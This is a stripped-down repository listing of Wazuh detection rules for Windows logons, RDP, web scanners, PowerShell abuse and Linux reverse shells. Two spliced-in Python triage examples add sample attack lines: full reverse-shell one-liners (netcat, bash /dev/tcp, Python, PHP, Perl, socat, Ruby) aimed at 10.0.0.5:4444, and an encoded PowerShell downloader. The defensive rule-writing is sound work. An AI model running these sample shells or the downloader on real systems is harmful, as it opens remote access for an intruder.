├── README.md ├── custom_remove_winlogon_events.xml ├── custom_linux.xml ├── custom_rdp.xml ├── custom_web_attack_rules.xml ├── custom_revshell_linux.xml ├── custom_windows_powershell_sysmon.xml ├── custom_windows_powershell_eventlog.xml ├── custom_sysmon_linux_groups.xml ├── custom_linux_syslog.xml ├── custom_sysmon_linux_rules.xml └── custom_sysmon_rules.xml /README.md: -------------------------------------------------------------------------------- 1 | # Wazuh Detection Rules 2 | Our collection of Wazuh detection rules (OSSEC rule syntax) for our Offense Lab. Drop these in /var/ossec/etc/rules/ on the Wazuh manager, check them with /var/ossec/bin/wazuh-logtest, and restart wazuh-manager so they are loaded. Several files use rule IDs outside the 100000-120000 range that Wazuh reserves for custom rules, so check that they do not collide with the built-in rule set. 3 | -------------------------------------------------------------------------------- /custom_remove_winlogon_events.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 7 | 60106,60137 8 | (^HealthMailbox.*$)||(^.*\$$) 9 | Ignore Windows Logon/Logoff Success 10 | no_full_log 11 | authentication_success,pci_dss_10.2.5,gpg13_7.1,gpg13_7.2,gdpr_IV_32.2, 12 | 13 | 14 | 15 | 60106,60137 16 | ^.*\$$ 17 | Ignore Windows Logon/Logoff Success 18 | no_full_log 19 | authentication_success,pci_dss_10.2.5,gpg13_7.1,gpg13_7.2,gdpr_IV_32.2, 20 | 21 | 22 | -------------------------------------------------------------------------------- /custom_linux.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 7 | 8 | 5555 9 | password changed for root 10 | Root password changed 11 | 12 | 13 | 14 | ^new group 15 | New group added to the system 16 | 17 | 18 | 19 | 5902 20 | GID=0|GID=10 21 | User created in group WHEEL or ROOT 22 | 23 | 24 | 25 | usermod|useradd 26 | add '\S+' to group 'root'|add '\S+' to group 'wheel' 27 | User added into group WHEEL or ROOT 28 | 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /custom_rdp.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 7 | 8 | 9 | 60009 10 | 
^Microsoft-Windows-TerminalServices-LocalSessionManager/Operational$ 11 | no_full_log 12 | Group of Windows rules for the Local Session Manager channel 13 | 14 | 15 | 16 | 999000 17 | 21 18 | Remote Desktop Session Logon 19 | 20 | 21 | 22 | 999000 23 | 23 24 | Remote Desktop Session Logoff 25 | 26 | 27 | 28 | 999000 29 | 24 30 | Remote Desktop Session Disconnected 31 | 32 | 33 | 34 | 999000 35 | 25 36 | Remote Desktop Session Reconnected 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /custom_web_attack_rules.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 31100 7 | Nikto 8 | Nikto user agent detected (known malicious user agent). 9 | pci_dss_6.5,pci_dss_11.4,gdpr_IV_35.7.d,nist_800_53_SA.11,nist_800_53_SI.4,tsc_CC6.6,tsc_CC7.1,tsc_CC8.1,tsc_CC6.1,tsc_CC6.8,tsc_CC7.2,tsc_CC7.3, 10 | 11 | 12 | 31100 13 | WPScan 14 | WPScan user agent detected (known malicious user agent). 15 | pci_dss_6.5,pci_dss_11.4,gdpr_IV_35.7.d,nist_800_53_SA.11,nist_800_53_SI.4,tsc_CC6.6,tsc_CC7.1,tsc_CC8.1,tsc_CC6.1,tsc_CC6.8,tsc_CC7.2,tsc_CC7.3, 16 | 17 | 18 | 31100 19 | Nikto 20 | Application under attack - Nikto scan detected (known malicious user agent). 21 | pci_dss_6.5,pci_dss_11.4,gdpr_IV_35.7.d,nist_800_53_SA.11,nist_800_53_SI.4,tsc_CC6.6,tsc_CC7.1,tsc_CC8.1,tsc_CC6.1,tsc_CC6.8,tsc_CC7.2,tsc_CC7.3, 22 | 23 | 24 | 31100 25 | WPScan 26 | Application under attack - WPScan scan detected (known malicious user agent). 
27 | pci_dss_6.5,pci_dss_11.4,gdpr_IV_35.7.d,nist_800_53_SA.11,nist_800_53_SI.4,tsc_CC6.6,tsc_CC7.1,tsc_CC8.1,tsc_CC6.1,tsc_CC6.8,tsc_CC7.2,tsc_CC7.3, 28 | 29 | 30 | 31100 31 | POST / 32 | /xmlrpc.php 33 | Potential password attack against xmlrpc.php 34 | pci_dss_6.5,pci_dss_11.4,gdpr_IV_35.7.d,nist_800_53_SA.11,nist_800_53_SI.4,tsc_CC6.6,tsc_CC7.1,tsc_CC8.1,tsc_CC6.1,tsc_CC6.8,tsc_CC7.2,tsc_CC7.3, 35 | 36 | 37 | -------------------------------------------------------------------------------- /custom_revshell_linux.xml: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | 10 | 80789 11 | /usr/bin/nc 12 | Netcat usage detected. 13 | audit_command, 14 | 15 | 16 | 110000 17 | -e 18 | Potential Shell: $(audit.exe) with user loginuid $(audit.auid) 19 | audit_command, 20 | 21 | 22 | 23 | 24 | 80789 25 | /usr/bin/bash 26 | Bash usage detected. 27 | audit_command, 28 | 29 | 30 | 110020 31 | /dev/tcp/ 32 | Potential Shell: $(audit.exe) with user loginuid $(audit.auid) 33 | audit_command, 34 | 35 | 36 | 110020 37 | /dev/udp/ 38 | Potential Shell: $(audit.exe) with user loginuid $(audit.auid) 39 | audit_command, 40 | 41 | 42 | 43 | 44 | 80789 45 | /usr/bin/python|/usr/bin/python2|/usr/bin/python3 46 | Python usage detected. 47 | audit_command, 48 | 49 | 50 | 110030 51 | -c 52 | socket.socket 53 | subprocess.call 54 | Potential Shell: $(audit.exe) with user loginuid $(audit.auid) 55 | audit_command, 56 | 57 | 58 | 59 | 60 | 61 | 80789 62 | /usr/bin/php 63 | PHP usage detected. 
64 | audit_command, 65 | 66 | 67 | 110050 68 | -r 69 | fsockopen 70 | exec 71 | Potential Shell: $(audit.exe) with user loginuid $(audit.auid) 72 | audit_command, 73 | 74 | 75 | -------------------------------------------------------------------------------- /custom_windows_powershell_sysmon.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | sysmon_event1 7 | powershell.exe 8 | Sysmon - Powershell Use Detected 9 | 10 | 11 | 12 | 184778 13 | -enc 14 | Amazon 15 | powershell.exe -ExecutionPolicy Restricted -Command Write-Host 16 | Sysmon - Powershell Encoding Detected 17 | 18 | 19 | 20 | 184778 21 | -w hidden|-window hidden|-windowstyle hidden 22 | Amazon 23 | powershell.exe -ExecutionPolicy Restricted -Command Write-Host 24 | Sysmon - Powershell Hidden Window Detected 25 | 26 | 27 | 28 | 184778 29 | -ep|-ExecutionPolicy|-Exec 30 | Amazon 31 | powershell.exe -ExecutionPolicy Restricted -Command Write-Host 32 | Sysmon - Powershell ExecutionPolicy Bypass Detected 33 | 34 | 35 | 36 | 184778 37 | DownloadString|DownloadFile 38 | Sysmon - Powershell Downloader Function Detected 39 | 40 | 41 | 42 | 184778 43 | http://|https:// 44 | Sysmon - Powershell URL in script Detected 45 | 46 | 47 | 48 | 184778 49 | -nop|-noprofile 50 | Amazon 51 | powershell.exe -ExecutionPolicy Restricted -Command Write-Host 52 | Sysmon - Powershell NoProfile Execution Detected 53 | 54 | 55 | 56 | 184778 57 | cmd.exe|excel.exe|msiexec.exe|winword.exe|wmiprvse.exe|explorer.exe|wscript.exe 58 | Sysmon - Powershell Started Indirectly 59 | 60 | 61 | 62 | 184778 63 | Invoke 64 | Sysmon - Powershell Invoke- Detected 65 | 66 | 67 | 68 | 184778 69 | PSSession 70 | Sysmon - Powershell Remote Session Use Detected 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /custom_windows_powershell_eventlog.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 7 | 60000 
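The PowerShell command-line rules in custom_windows_powershell_sysmon.xml above chain off the Sysmon event 1 "powershell.exe" rule and look for flag fragments (-enc, hidden window, ExecutionPolicy, -nop, DownloadString, URLs, Invoke-, PSSession), whitelisting two benign command lines ("Amazon" and the `-ExecutionPolicy Restricted -Command Write-Host` invocation). What those rules cannot do is see inside an `-EncodedCommand` blob, which is Base64 of the script in UTF-16LE; a downloader hidden there never trips the DownloadString or URL rule. The example below is added here and is not code from the repository: it re-implements the rule families in Python over constructed Sysmon command lines, decodes the encoded payload and scans it with the same patterns (the script-block rules in custom_windows_powershell_eventlog.xml that follow look for cmdlet names in the same way). The flag spellings (`-e`/`-ec`/`-enc`, `-w`/`-windowstyle`, `-ep`/`-ex`/`-executionpolicy`, `-nop`/`-noprofile`) are powershell.exe's own accepted abbreviations; requiring `Bypass`/`Unrestricted` after the ExecutionPolicy flag is a tightening chosen for this example, since the page's rule matches any ExecutionPolicy value and relies on the whitelist to drop "Restricted".

```python
"""Triage of Sysmon event 1 PowerShell command lines (added example, not repository code)."""
import base64
import re

# Whitelist strings carried over from the rule file.
EXCLUSIONS = ("Amazon", "powershell.exe -ExecutionPolicy Restricted -Command Write-Host")

# (description from the rule file, regex applied case-insensitively to the command
# line plus the decoded -EncodedCommand payload).
RULES = [
    ("Powershell Encoding Detected",               r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s"),
    ("Powershell Hidden Window Detected",          r"(?:^|\s)-(?:w|window|windowstyle)\s+hidden\b"),
    ("Powershell ExecutionPolicy Bypass Detected", r"(?:^|\s)-(?:ep|ex|exec|executionpolicy)\s+(?:bypass|unrestricted)\b"),
    ("Powershell NoProfile Execution Detected",    r"(?:^|\s)-(?:nop|noprofile)\b"),
    ("Powershell Downloader Function Detected",    r"download(?:string|file)"),
    ("Powershell URL in script Detected",          r"https?://"),
    ("Powershell Invoke- Detected",                r"\binvoke-"),
    ("Powershell Remote Session Use Detected",     r"pssession"),
]

ENCODED = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script):
    """Inverse of decode_encoded_command: how the -enc argument is produced."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage(cmdline):
    """Rule descriptions the command line triggers; whitelisted lines return []."""
    if any(x in cmdline for x in EXCLUSIONS):
        return []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        text += " " + decoded  # scan the hidden script with the same rules
    return [name for name, pat in RULES if re.search(pat, text, re.I)]


# Constructed command lines for this example, not captured from a real host.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"
SAMPLES = {
    "encoded_downloader": "powershell.exe -nop -w hidden -enc " + encode_command(SAMPLE_SCRIPT),
    "plain_bypass": "powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\Public\\run.ps1",
    "remoting": 'powershell.exe -Command "Enter-PSSession -ComputerName FS01"',
    "whitelisted": "powershell.exe -ExecutionPolicy Restricted -Command Write-Host ready",
    "benign": "powershell.exe -Command Get-Date",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(f"{label:20s} {triage(cmd)}")
        decoded = decode_encoded_command(cmd)
        if decoded:
            print(f"{'':20s} decoded: {decoded}")
```

Only the flag rules fire on the raw encoded command line; the downloader and URL rules fire because the payload was decoded first. In Wazuh itself that step needs either the 4104 script-block log (where the decoded script appears in clear) or a decoder that unpacks the argument, so keep the Sysmon rules for the flags and lean on the script-block rules for content.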
8 | ^Microsoft-Windows-Powershell/Operational$ 9 | no_full_log 10 | Group of Windows rules for the Powershell channel 11 | 12 | 13 | 68000 14 | 4104 15 | Powershell - Script executed 16 | Powershell_event, 17 | 18 | 19 | 20 | 68001 21 | runtime.interopservices.marshal 22 | PowerShell - Potential in-memory C# via powershell 23 | 24 | 25 | 26 | 68001 27 | Invoke-DllInjection|Invoke-Shellcode|Invoke-WmiCommand|Get-GPPPassword|Get-Keystrokes|Get-TimedScreenshot|Get-VaultCredential|Invoke-CredentialInjection|mimikatz|Invoke-NinjaCopy|Invoke-TokenManipulation|Out-Minidump|VolumeShadowCopyTools|Invoke-ReflectivePEInjection|Invoke-UserHunter|Find-GPOLocation|Invoke-ACLScanner|Invoke-DowngradeAccount|Get-ServiceUnquoted|Get-ServiceFilePermission|Get-ServicePermission|Invoke-ServiceAbuse|Install-ServiceBinary|Get-RegAutoLogon|Get-VulnAutoRun|Get-VulnSchTask|Get-UnattendedInstallFile|Get-WebConfig|Get-ApplicationHost|Get-RegAlwaysInstallElevated|Get-Unconstrained|Add-RegBackdoor|Add-ScrnSaveBackdoor|Gupt-Backdoor|Invoke-ADSBackdoor|Enabled-DuplicateToken|Invoke-PsUaCme|Remove-Update|Check-VM|Get-LSASecret|Get-PassHashes|Show-TargetScreen|Port-Scan|netscan|psscan|Invoke-PoshRatHttp|Invoke-PowerShellTCP|Invoke-PowerShellWMI|Add-Exfiltration|Add-Persistence|Do-Exfiltration|Start-CaptureServer|Invoke-DllInjection|Invoke-ReflectivePEInjection|Invoke-ShellCode|Get-ChromeDump|Get-ClipboardContents|Get-FoxDump|Get-IndexedItem|Get-Keystrokes|Get-Screenshot|Invoke-Inveigh|Invoke-NetRipper|Invoke-NinjaCopy|Out-Minidump|Invoke-EgressCheck|Invoke-PSInject|Invoke-RunAs|MailRaider|New-HoneyHash|Set-MacAttribute|Get-VaultCredential|Invoke-DCSync|Invoke-PowerDump|Invoke-TokenManipulation|Exploit-Jboss|Invoke-ThunderStruck|Invoke-VoiceTroll|Invoke-InveighRelay|Invoke-PsExec|Invoke-SSHCommand|Get-SecurityPackages|Install-SSP|Invoke-BackdoorLNK|PowerBreach|Get-GPPPassword|Get-SiteListPassword|Get-System|BypassUAC|Invoke-Tater|PowerUp|PowerView|Get-RickAstley|Find-Fruit|HTTP-Login|Find-TrustedDocu
ments|Invoke-Paranoia|Invoke-WinEnum|Invoke-ARPScan|Invoke-ReverseDNSLookup|smbscanner|Invoke-FruityC2|Invoke-Stager 28 | Amazon 29 | Get-SystemDriveInfo 30 | PowerShell - Potentially malicious command detected 31 | 32 | 33 | 34 | 68001 35 | DownloadString|downloadfile 36 | PowerShell - Potential download - could be legitimate 37 | 38 | 39 | 45 | 46 | -------------------------------------------------------------------------------- /custom_sysmon_linux_groups.xml: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | sysmon-linux 10 | Sysmon For Linux Group. 11 | 12 | 13 | 14 | 150000 15 | ^1$ 16 | Sysmon Event ID 1 17 | sysmon_linux_event1, 18 | 19 | 20 | 21 | 150000 22 | ^2$ 23 | Sysmon Event ID 2 24 | sysmon_linux_event2, 25 | 26 | 27 | 28 | 150000 29 | ^3$ 30 | Sysmon Event ID 3 31 | sysmon_linux_event3, 32 | 33 | 34 | 35 | 150000 36 | ^4$ 37 | Sysmon Event ID 4 38 | sysmon_linux_event4, 39 | 40 | 41 | 42 | 150000 43 | ^5$ 44 | Sysmon Event ID 5 45 | sysmon_linux_event5, 46 | 47 | 48 | 49 | 150000 50 | ^6$ 51 | Sysmon Event ID 6 52 | sysmon_linux_event6, 53 | 54 | 55 | 56 | 150000 57 | ^7$ 58 | Sysmon Event ID 7 59 | sysmon_linux_event7, 60 | 61 | 62 | 63 | 150000 64 | ^8$ 65 | Sysmon Event ID 8 66 | sysmon_linux_event8, 67 | 68 | 69 | 70 | 150000 71 | ^9$ 72 | Sysmon Event ID 9 73 | sysmon_linux_event9, 74 | 75 | 76 | 77 | 78 | 150000 79 | ^10$ 80 | Sysmon Event ID 10 81 | sysmon_linux_event10, 82 | 83 | 84 | 85 | 150000 86 | ^11$ 87 | Sysmon Event ID 11 88 | sysmon_linux_event11, 89 | 90 | 91 | 92 | 150000 93 | ^12$ 94 | Sysmon Event ID 12 95 | sysmon_linux_event12, 96 | 97 | 98 | 99 | 150000 100 | ^13$ 101 | Sysmon Event ID 13 102 | sysmon_linux_event13, 103 | 104 | 105 | 106 | 150000 107 | ^14$ 108 | Sysmon Event ID 14 109 | sysmon_linux_event14, 110 | 111 | 112 | 113 | 150000 114 | ^15$ 115 | Sysmon Event ID 15 116 | sysmon_linux_event15, 117 | 118 | 119 | 120 | 150000 121 | ^16$ 122 | Sysmon Event ID 16 123 | 
sysmon_linux_event16, 124 | 125 | 126 | 127 | 150000 128 | ^17$ 129 | Sysmon Event ID 17 130 | sysmon_linux_event17, 131 | 132 | 133 | 134 | 150000 135 | ^18$ 136 | Sysmon Event ID 18 137 | sysmon_linux_event18, 138 | 139 | 140 | 141 | 150000 142 | ^19$ 143 | Sysmon Event ID 19 144 | sysmon_linux_event19, 145 | 146 | 147 | 148 | 150000 149 | ^20$ 150 | Sysmon Event ID 20 151 | sysmon_linux_event20, 152 | 153 | 154 | 155 | 150000 156 | ^21$ 157 | Sysmon Event ID 21 158 | sysmon_linux_event21, 159 | 160 | 161 | 162 | 150000 163 | ^22$ 164 | Sysmon Event ID 22 165 | sysmon_linux_event22, 166 | 167 | 168 | 169 | 150000 170 | ^23$ 171 | Sysmon Event ID 23 172 | sysmon_linux_event23, 173 | 174 | 175 | 176 | 150000 177 | ^24$ 178 | Sysmon Event ID 24 179 | sysmon_linux_event24, 180 | 181 | 182 | 183 | 150000 184 | ^25$ 185 | Sysmon Event ID 25 186 | sysmon_linux_event25, 187 | 188 | 189 | 190 | 150000 191 | ^26$ 192 | Sysmon Event ID 26 193 | sysmon_linux_event26, 194 | 195 | 196 | 197 | 150000 198 | ^255$ 199 | Sysmon Event ID 255 200 | sysmon_linux_event255, 201 | 202 | 203 | -------------------------------------------------------------------------------- /custom_linux_syslog.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 80789 5 | /usr/bin/nc|nc|ncat 6 | Netcat usage detected. 7 | 8 | 9 | 111000 10 | -e 11 | Potential Shell: $(audit.exe) with user loginuid $(audit.auid) 12 | 13 | 14 | 111000 15 | -c 16 | Potential Shell: $(audit.exe) with user loginuid $(audit.auid) 17 | 18 | 19 | 20 | 21 | 22 | 23 | 80789 24 | /usr/bin/nmap 25 | Nmap usage detected. 26 | 27 | 28 | 29 | 30 | 31 | ^usercommand 32 | usercommand detected. 33 | 34 | 35 | 36 | 37 | 101000 38 | sh 39 | Potential Shell Usage. 40 | 41 | 42 | 101020 43 | /dev/tcp/ 44 | Potential Shell Detected. 45 | 46 | 47 | 101020 48 | /dev/udp/ 49 | Potential Shell Detected. 50 | 51 | 52 | 53 | 54 | 101000 55 | python 56 | Potential Python Usage. 
57 | 58 | 59 | 101040 60 | -c 61 | socket 62 | subprocess 63 | call 64 | Potential Shell Detected. 65 | 66 | 67 | 101040 68 | -c 69 | socket 70 | pty 71 | spawn 72 | Potential Shell Detected. 73 | 74 | 75 | 76 | 77 | 101000 78 | php 79 | PHP usage detected. 80 | 81 | 82 | 101060 83 | -r 84 | fsockopen 85 | exec|shell_exec|system|passthru|popen|` 86 | Potential Shell Detected. 87 | 88 | 89 | 90 | 91 | 101000 92 | perl 93 | Perl usage detected. 94 | 95 | 96 | 101080 97 | -e 98 | socket 99 | connect 100 | Potential Shell Detected. 101 | 102 | 103 | 101080 104 | -MIO 105 | -e 106 | Socket 107 | Potential Shell Detected. 108 | 109 | 110 | 111 | 112 | 101000 113 | socat 114 | Socat usage detected. 115 | 116 | 117 | 101100 118 | exec 119 | tcp 120 | Potential Shell Detected. 121 | 122 | 123 | 124 | 125 | 101000 126 | ruby 127 | Ruby usage detected. 128 | 129 | 130 | 101120 131 | -rsocket 132 | -e 133 | tcpsocket 134 | Potential Shell Detected. 135 | 136 | 137 | 138 | 139 | 101000 140 | xterm 141 | Xterm usage detected. 142 | 143 | 144 | 101140 145 | -display 146 | Potential Shell Detected. 147 | 148 | 149 | 150 | 151 | 101000 152 | xhost 153 | xhost usage detected. 154 | 155 | 156 | 157 | 158 | 101000 159 | Xnest 160 | Xnest usage detected. 161 | 162 | 163 | 164 | 165 | 101000 166 | nc 167 | Netcat usage detected. 168 | 169 | 170 | 101200 171 | rm 172 | mkfifo|mknod 173 | Potential Shell Detected. 174 | 175 | 176 | 177 | 178 | 101000 179 | awk 180 | awk usage detected. 181 | 182 | 183 | 101220 184 | /inet/tcp/ 185 | Potential Shell Detected. 186 | 187 | 188 | 189 | 190 | 101000 191 | telnet 192 | telnet usage detected. 193 | 194 | 195 | 101240 196 | sh 197 | Potential Shell Detected. 198 | 199 | 200 | 201 | 202 | 101000 203 | lua 204 | lua usage detected. 205 | 206 | 207 | 101260 208 | socket 209 | execute 210 | Potential Shell Detected. 
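The reverse-shell rules in custom_revshell_linux.xml (auditd command events), custom_linux_syslog.xml above and the Sysmon for Linux variants in custom_sysmon_linux_rules.xml all follow the same shape: a parent rule fires on the interpreter name (nc, bash, python, php, perl, socat, ruby, awk, lua, xterm) and a child rule requires several fragments to be present at once (for example `-c`, `socket`, `subprocess` and `call` for Python), since conditions inside one Wazuh rule are ANDed. The example below is added here and is not code from the repository: it re-implements that two-level logic in Python so the patterns can be exercised offline against constructed command lines, including benign ones that share an interpreter with the attack. The interpreter regexes (`PRE` plus the binary name) are this example's replacement for the bare `nc`/`python`/`php` strings of the parent rules; the fragment lists are the ones the rule files use.

```python
"""Command-line reverse-shell triage (added example, not repository code)."""
import re

# Start of line, whitespace, path separator or shell operator may precede the
# interpreter, so "/usr/bin/nc", "|nc" and ";bash" all count as the interpreter.
PRE = r"(?:^|[\s/;|&(])"

# (rule name, interpreter regex, fragments that must ALL match, case-insensitively).
RULES = [
    ("Netcat -e shell",          PRE + r"(?:nc|ncat|netcat)\b", [r"\s-e\s"]),
    ("Netcat -c shell",          PRE + r"(?:nc|ncat|netcat)\b", [r"\s-c\s"]),
    ("mkfifo/netcat shell",      PRE + r"(?:nc|ncat|netcat)\b", [r"\brm\b", r"mkfifo|mknod"]),
    ("Bash /dev/tcp shell",      PRE + r"(?:ba|da|z|k)?sh\b",   [r"/dev/tcp/"]),
    ("Bash /dev/udp shell",      PRE + r"(?:ba|da|z|k)?sh\b",   [r"/dev/udp/"]),
    ("Python socket+subprocess", PRE + r"python[23]?\b",        [r"\s-c\s", "socket", "subprocess", "call"]),
    ("Python socket+pty",        PRE + r"python[23]?\b",        [r"\s-c\s", "socket", "pty", "spawn"]),
    ("PHP fsockopen shell",      PRE + r"php\b",                [r"\s-r\s", "fsockopen", r"exec|shell_exec|system|passthru|popen|`"]),
    ("Perl socket shell",        PRE + r"perl\b",               [r"\s-e\s", "socket", "connect"]),
    ("Perl IO::Socket shell",    PRE + r"perl\b",               [r"-MIO", r"\s-e\s", "Socket"]),
    ("Socat exec shell",         PRE + r"socat\b",              ["exec", "tcp"]),
    ("Ruby TCPSocket shell",     PRE + r"ruby\b",               ["-rsocket", r"\s-e\s", "tcpsocket"]),
    ("awk /inet/tcp shell",      PRE + r"awk\b",                [r"/inet/tcp/"]),
    ("Lua socket shell",         PRE + r"lua\b",                ["socket", "execute"]),
    ("xterm -display shell",     PRE + r"xterm\b",              [r"-display"]),
]


def classify(cmdline):
    """Names of every rule whose interpreter and all fragments match the command line."""
    return [name for name, interp, frags in RULES
            if re.search(interp, cmdline, re.I)
            and all(re.search(f, cmdline, re.I) for f in frags)]


# Constructed command lines for this example; the first eight are textbook reverse
# shells, the last three are benign uses of the same interpreters.
SAMPLES = [
    "nc -e /bin/sh 10.0.0.5 4444",
    "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));"
    "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);subprocess.call([\"/bin/sh\",\"-i\"])'",
    "php -r '$sock=fsockopen(\"10.0.0.5\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "perl -e 'use Socket;$i=\"10.0.0.5\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));"
    "connect(S,sockaddr_in($p,inet_aton($i)));'",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 4444 >/tmp/f",
    "socat tcp:10.0.0.5:4444 exec:/bin/sh,pty,stderr",
    "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"10.0.0.5\",\"4444\");"
    "while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'",
    "python3 -c 'print(1+1)'",
    "nc -zv 10.0.0.5 22",
    "bash -c 'echo hello'",
]


def scan(cmdlines=SAMPLES):
    """Map each command line to the rules it triggers."""
    return {c: classify(c) for c in cmdlines}


if __name__ == "__main__":
    for cmd, hits in scan().items():
        print(f"{hits or ['-']}  <-  {cmd[:70]}")
```

The three benign lines show why the two-level design matters: `nc -zv` and `python3 -c 'print(1+1)'` reach the parent rule but not the child, and the plain `nc` parent would be noisy on its own. Fragments such as `rm` and `call` are deliberately loose, as in the rule files; when tuning, tighten the child fragments rather than the interpreter match.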
211 | 212 | 213 | -------------------------------------------------------------------------------- /custom_sysmon_linux_rules.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | sysmon_linux_event1 7 | /usr/bin/nc|nc|ncat 8 | SysmonForLinux - Netcat usage detected. 9 | 10 | 11 | 151000 12 | no_full_log 13 | -e 14 | SysmonForLinux - Potential Shell Detected. 15 | reverse_shells, 16 | 17 | 18 | 151001 19 | 20 | SysmonForLinux - Potential Shell Detected. 21 | reverse_shells, 22 | 23 | 24 | 151000 25 | no_full_log 26 | -c 27 | SysmonForLinux - Potential Shell Detected. 28 | reverse_shells, 29 | 30 | 31 | 151003 32 | 33 | SysmonForLinux - Potential Shell Detected. 34 | reverse_shells, 35 | 36 | 37 | 38 | sysmon_linux_event3 39 | no_full_log 40 | sh|bash|dash|fish|zsh|ksh|csh|busybox|tcsh|tclsh 41 | SysmonForLinux - Shell connecting to $(eventdata.destinationIp) on port $(eventdata.destinationPort). 42 | 43 | 44 | 45 | 46 | 151010 47 | SysmonForLinux - Shell connecting to $(eventdata.destinationIp) on port $(eventdata.destinationPort). 48 | 49 | 50 | 51 | sysmon_linux_event1 52 | python 53 | SysmonForLinux - Python usage detected. 54 | 55 | 56 | 151020 57 | -c 58 | socket 59 | subprocess 60 | call 61 | SysmonForLinux - Potential Python Shell Detected. 62 | reverse_shells, 63 | 64 | 65 | 151020 66 | -c 67 | socket 68 | pty 69 | spawn 70 | SysmonForLinux - Potential Python Shell Detected. 71 | reverse_shells, 72 | 73 | 74 | 75 | sysmon_linux_event3 76 | ^/tmp|^/home|^/root 77 | no_full_log 78 | SysmonForLinux - Program connecting to $(eventdata.destinationIp) on port $(eventdata.destinationPort) from binary in uncommon location. 79 | 80 | 81 | 82 | 151030 83 | 84 | ^/tmp|^/home|^/root 85 | SysmonForLinux - Program connecting to $(eventdata.destinationIp) on port $(eventdata.destinationPort) from binary in uncommon location. 86 | 87 | 88 | 89 | sysmon_linux_event1 90 | php 91 | SysmonForLinux - PHP usage detected. 
92 | 93 | 94 | 151040 95 | -r 96 | fsockopen 97 | exec|shell_exec|system|passthru|popen|` 98 | SysmonForLinux - Potential PHP Shell Detected. 99 | reverse_shells, 100 | 101 | 102 | 103 | 104 | 105 | sysmon_linux_event1 106 | perl 107 | Perl usage detected. 108 | 109 | 110 | 151050 111 | -e 112 | socket 113 | connect 114 | Potential Perl Shell Detected. 115 | 116 | 117 | 151050 118 | -MIO 119 | -e 120 | Socket 121 | Potential Perl Shell Detected. 122 | 123 | 124 | 125 | 126 | 127 | 128 | sysmon_linux_event1 129 | socat 130 | Socat usage detected. 131 | 132 | 133 | 151060 134 | exec 135 | tcp 136 | SysmonForLinux - Potential Shell Detected. 137 | 138 | 139 | 140 | 141 | sysmon_linux_event1 142 | ruby 143 | Ruby usage detected. 144 | 145 | 146 | 151070 147 | -rsocket 148 | -e 149 | tcpsocket 150 | SysmonForLinux - Potential Shell Detected. 151 | 152 | 153 | 154 | 155 | sysmon_linux_event1 156 | xterm 157 | Xterm usage detected. 158 | 159 | 160 | 151080 161 | -display 162 | SysmonForLinux - Potential Shell Detected. 163 | 164 | 165 | 166 | 167 | sysmon_linux_event1 168 | xhost 169 | xhost usage detected. 170 | 171 | 172 | 173 | 174 | sysmon_linux_event1 175 | Xnest 176 | Xnest usage detected. 177 | 178 | 179 | 180 | 181 | sysmon_linux_event1 182 | nc 183 | Netcat usage detected. 184 | 185 | 186 | 151110 187 | rm 188 | mkfifo|mknod 189 | SysmonForLinux - Potential Shell Detected. 190 | 191 | 192 | 193 | 194 | sysmon_linux_event1 195 | awk 196 | awk usage detected. 197 | 198 | 199 | 151120 200 | /inet/tcp/ 201 | SysmonForLinux - Potential Shell Detected. 202 | 203 | 204 | 205 | 206 | sysmon_linux_event1 207 | telnet 208 | telnet usage detected. 209 | 210 | 211 | 151130 212 | sh 213 | SysmonForLinux - Potential Shell Detected. 214 | 215 | 216 | 217 | 218 | sysmon_linux_event1 219 | lua 220 | lua usage detected. 221 | 222 | 223 | 151140 224 | socket 225 | execute 226 | SysmonForLinux - Potential Shell Detected. 
